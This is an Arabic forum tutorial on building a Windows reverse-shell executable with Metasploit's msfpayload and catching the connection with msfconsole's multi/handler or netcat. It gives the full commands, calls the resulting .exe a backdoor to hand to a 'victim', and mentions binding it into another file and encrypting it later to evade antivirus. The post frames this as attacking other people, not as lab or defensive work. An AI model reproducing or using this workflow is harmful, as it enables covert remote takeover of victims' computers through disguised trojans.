السلام عليكم ورحمة الله وبركاته
الكثير يستخدم تروجان وملف لأحد البرامج ويكون مكشوف .. ويشفره . وو ,, ,, وو وو ؟؟!!
سأشرح كيفية صنع ملف تنفيذي من البايلود والإتصال به عبر النت كات . او الميتا ..
اولا يجب أن نعلم أنه تختلف كل بايلود عن أخرى .. منها لا يمكننا أن نتصل عبر نت كات مثل الفي أن سي او الميتر بريتر ,, فإنه بامكانك استخدام النت كات اما للإتصال مع بايلود bind
او التنصت على reverse عكسي .. عبر بورت تكون اخترته وقت انشاء البايلود ..
المهم بعد ما ندخل على مسار msfpayload
كود:
cd penet/exploits/framework3
نكتب
كود:
./msfpayload -?
Usage: ./msfpayload <payload> [var=val] <S [ummary] | C | P [erl] | R [aw] | J [avascript] | e [X]ecutable>
كود:
./msfpayload
<payload>اسم البايلود اللي بدك تختارها
[var=val] متطلباتها من بورت وأيبي جهازك LHOST=yourIP LPORT=4321
مش شرط نفسهن ... حسب البايلود
اتصال البايند ما بده ألأيبي تبعك .. نك سوف تتصل من النت كات
بينما العكسي بحاجة للأيبي تبعك .. وهكذا حسب البايلود
تقولي كيف بعرف شو بدها البايلود .. بقلك اكتب البايلود وبعدها حرف أس كبير
كود:
./msfpayload payload S
S تلخيص لمتطلبات البايلود
C شل كود لبايلود لوضعه بالثغرة بلغة السي
J شل كود لبايلود لوضعه بالثغرة بلغة الجافا
R شل كود بلغة الألة .. أسيمبلي وجاهز ليوضع بثغرة بفر .. وأيضا لكي تشفره بعدين
X من شان تعمل شل كود بإمتداد إي أكس إي جاهز للتنفيذ .. فقط سلمه للضحية .. وكأنه باكدور..وانت تنصت بالنت كات او اتصل به .. او تنصت بالميتا ..
> حتى تطلع البايلود للخارج .. وتلاقيها مكان الميتا بالفريموورك
/penet/exploits/framework3
ورح نشوف مثال لبايلود ريفيرس بإمتداد إي أكس إي .. يعني استخدمنا أكس.. وتطبيقه والتنصت بالميتا وإعطائه للضحية
كود:
./msfpayload windows/shell/reverse_tcp LHOST=192.13.0.100 LPORT=4321 X > revshell_4321.exe
بعد ما تنتهي منلاقيها بجنب الميتا .. نحطها وندمجها .. ونعطيها للضحية .. مكشوفة من حوالي 4 حمايات .. ولاحقا نشفرها .
الأن نتنصت بالميتا ..
ندخل عليه ..
كود:
./msfconsole
use multi/handler
set lhost 192.13.0.100
set lport 4321
set payload windows/shell/reverse_tcp
exploit
multi/handler للتنصت
لاحظنا نفس خيارات البايلود .. الأن ننتظر حتى الضحية يفتح الملف .. نشوف الصورة ..
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]لاحظنا كيف تنصتنا ,, وانتظرنا حتى الضحية فتح البايلود..وشبكنا إتصال عكسي مع الدوس ..
ملاحظة يمكن استخدام بايلود تانية والبايند والريفرس فينا نستخدم النت كات .. إلا بيالودات متل الفي أن سي وهيك ..
المهم تكونو فهمتو المعلومة . وانشالله كل شي تمام ..
وننتظر الدروس القادمة